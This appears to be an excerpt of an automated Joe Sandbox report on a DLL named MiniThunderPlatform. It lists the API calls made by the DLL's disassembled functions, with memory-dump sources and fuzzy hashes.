                                                                                                                                                • Part of subcall function 100184D9: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003A,00000000), ref: 1001850B
                                                                                                                                                • Part of subcall function 100184D9: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001853A
                                                                                                                                                • Part of subcall function 100184D9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10018546
                                                                                                                                                • Part of subcall function 100184D9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001857C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D4F0
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001D52E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D53E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D553
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001D564
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003A,00000000), ref: 1001D574
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001D5A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D5AF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D5BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D5ED
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D60B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D618
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D625
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D64C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D6BA
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D6DB
                                                                                                                                                • Part of subcall function 1001A696: __EH_prolog.LIBCMT ref: 1001A69B
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6A8
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6B6
                                                                                                                                                • Part of subcall function 10013A50: StringFromIID.COMBASE(?,?), ref: 10013A96
                                                                                                                                                • Part of subcall function 10013A50: lstrlenW.KERNEL32(?), ref: 10013AA7
                                                                                                                                                • Part of subcall function 10013A50: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000), ref: 10013AD6
                                                                                                                                                • Part of subcall function 10013A50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 10013AEA
                                                                                                                                                • Part of subcall function 10013A50: CoTaskMemFree.COMBASE(?), ref: 10013AFC
                                                                                                                                                • Part of subcall function 10013A50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10013B0B
                                                                                                                                                • Part of subcall function 10013A50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013B1B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$CriticalH_prologSectionV01@@$?find_first_of@?$basic_string@Leave$ByteCharEnterFreeFromMultiStringTaskWidelstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2899546728-0
                                                                                                                                              • Opcode ID: 8c580b2a6125cdb2f1d752d3fca891322f33182ef50ae964ce93aab29445ec6f
                                                                                                                                              • Instruction ID: 59ac8e7709fb823c137b89c6d6daeea648b4e2f1132058a5f0f3d1a5611a1054
                                                                                                                                              • Opcode Fuzzy Hash: 8c580b2a6125cdb2f1d752d3fca891322f33182ef50ae964ce93aab29445ec6f
                                                                                                                                              • Instruction Fuzzy Hash: 02714F31900269DFDF11DBA4C948BDDBBB9EF29304F0441D9E50AA7191DB74AB89CF21
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,00000000), ref: 1005C3C2
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 1005C3E5
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1005C403
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1005C419
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C42B
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(1027B92C), ref: 1005C45B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C48F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C49C
                                                                                                                                              • inet_addr.WS2_32(00000002), ref: 1005C4C7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1005C4DE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005C53D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1005C555
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C5DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C605
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$V01@@V12@$?assign@?$basic_string@V12@@$??3@?find@?$basic_string@?substr@?$basic_string@inet_addr
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 4073539127-1885708031
                                                                                                                                              • Opcode ID: a4ff00eb6cf873b878b729097e26f05a45ea5f7428009302b8666e096ffcda8f
                                                                                                                                              • Instruction ID: b28ee95735312f79dd750afbd82653e09784f3460151edb3a7d7690cd24dcf7e
                                                                                                                                              • Opcode Fuzzy Hash: a4ff00eb6cf873b878b729097e26f05a45ea5f7428009302b8666e096ffcda8f
                                                                                                                                              • Instruction Fuzzy Hash: A9615E71408392DFD330DB54C888FAFBBE4EB99604F444A5DF59A83252EB746548CBA3
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?), ref: 10029645
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?), ref: 10029659
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 10029677
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 10029689
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100296AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100296B8
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100296C7
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100296E8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100296F6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B994), ref: 10029705
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10029713
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B998,?,00000000,?,00000000,?,?,?), ref: 10029738
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10029759
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029767
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,00000000,?,?,?), ref: 10029775
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,00000000,?,?,?), ref: 10029786
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029799
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$?append@?$basic_string@V12@$V12@@$??1?$basic_string@$??0?$basic_string@$??$?9D@1@@std@@D@2@@0@V01@V01@@V?$basic_string@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3445678870-0
                                                                                                                                              • Opcode ID: ebf599228aea2071a48c9f6d72dd729e60325a43fdb13175afa8716ad5768778
                                                                                                                                              • Instruction ID: 056f919e8539a1a77885e6b40d201ca2f31af14a36d6a175e682d574d3883a1a
                                                                                                                                              • Opcode Fuzzy Hash: ebf599228aea2071a48c9f6d72dd729e60325a43fdb13175afa8716ad5768778
                                                                                                                                              • Instruction Fuzzy Hash: DB419A71408391AFC711CF24CC9CA9BBBE8FFA9744F40091DF98683262DB34A549CB62
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1009916D
                                                                                                                                              • strstr.MSVCR71(?,,00000000,?,00000001), ref: 100991A9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000000), ref: 100991C9
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(00000000,102768F0,-00000064), ref: 1009922B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009924C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 10099278
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099285
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992C7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100992D4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099303
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??$?9??0?$basic_string@D@1@@std@@D@2@@0@H_prologV?$basic_string@mallocstrstr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3181552730-2344752452
                                                                                                                                              • Opcode ID: 2ed8ec4f14c6ef4778e73fdc846fdc1b20ce02eb4e10b5c4d20766385d1132c8
                                                                                                                                              • Instruction ID: c7c5adfa567a656bbf0ba381d2e297abf3c08019f68c4dccbf6bf31105df7def
                                                                                                                                              • Opcode Fuzzy Hash: 2ed8ec4f14c6ef4778e73fdc846fdc1b20ce02eb4e10b5c4d20766385d1132c8
                                                                                                                                              • Instruction Fuzzy Hash: C471C930A00349EFDB14CFA8C998BEEBBF9EF58340F14405DE45AA7281CB756A05DB10
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD1D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100BD1D0: _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100BD4C6
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71 ref: 100BD4F6
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD4FD
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD504
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD50B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD512
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100BD520
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100BD54D
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100BD55D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?), ref: 100BD572
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 100BD5A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??6?$basic_ostream@ExceptionThrowV01@V12@$??0?$basic_string@??0?$basic_stringstream@??0exception@@?assign@?$basic_string@?erase@?$basic_string@?str@?$basic_stringstream@D@2@@2@V?$basic_string@
                                                                                                                                              • String ID: ] is greater than buffer size[$]! it's illegal!$string length [
                                                                                                                                              • API String ID: 375490266-2902506487
                                                                                                                                              • Opcode ID: 347c69cfd8f4dc2dc61f23d7f2047c3f056b69b741702c6ee95d9f1a96726a81
                                                                                                                                              • Instruction ID: ea9148073c1c2b5b1cc063011b159885b4a362f79c2f0eebe55b2d598d16b2d3
                                                                                                                                              • Opcode Fuzzy Hash: 347c69cfd8f4dc2dc61f23d7f2047c3f056b69b741702c6ee95d9f1a96726a81
                                                                                                                                              • Instruction Fuzzy Hash: 50315A75504750AFC324DF54CC98B9BB7E9FB98710F04CA1EE59A932A0EB74A848CB52
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4033
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_change_ex,?), ref: 100C404D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Can't get setting instance!), ref: 100C406D
                                                                                                                                                • Part of subcall function 100C36BF: ??0exception@@QAE@ABQBD@Z.MSVCR71(-00000050,?,00000000,100C4082,-00000050), ref: 100C36DF
                                                                                                                                              • _CxxThrowException.MSVCR71(-00000018,102CA7C4,-00000050), ref: 100C408B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100C4095
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100C40AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(-00000034,-00000050,000000FF), ref: 100C40D5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C40E2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-0000006C), ref: 100C4110
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C411D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@??4?$basic_string@?assign@?$basic_string@ExceptionH_prologThrowV01@V12@V12@@
                                                                                                                                              • String ID: Can't get setting instance!$cmd_report_change_ex$hub_agent$max_url_length
                                                                                                                                              • API String ID: 4028102758-2769586971
                                                                                                                                              • Opcode ID: 81686647557379cc857c74810f53677f38f3d091b76f3c3168a444730de91423
                                                                                                                                              • Instruction ID: e2be55161009ce298ec2c0ffa1c38c26361e4c4eff7dc68ebcc3296d8c782fb1
                                                                                                                                              • Opcode Fuzzy Hash: 81686647557379cc857c74810f53677f38f3d091b76f3c3168a444730de91423
                                                                                                                                              • Instruction Fuzzy Hash: 2D314D75800214EFD714DBA4D98DADEB7F8FB58310F10829AE55AA32A1DB706649CF20
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710AE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710C0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100710CD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710E7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(-00000004,?), ref: 10071104
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071110
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071148
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071155
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071162
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071175
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,00000000,00000000), ref: 100711C8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100711D8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10071214
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071221
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007122E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071241
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
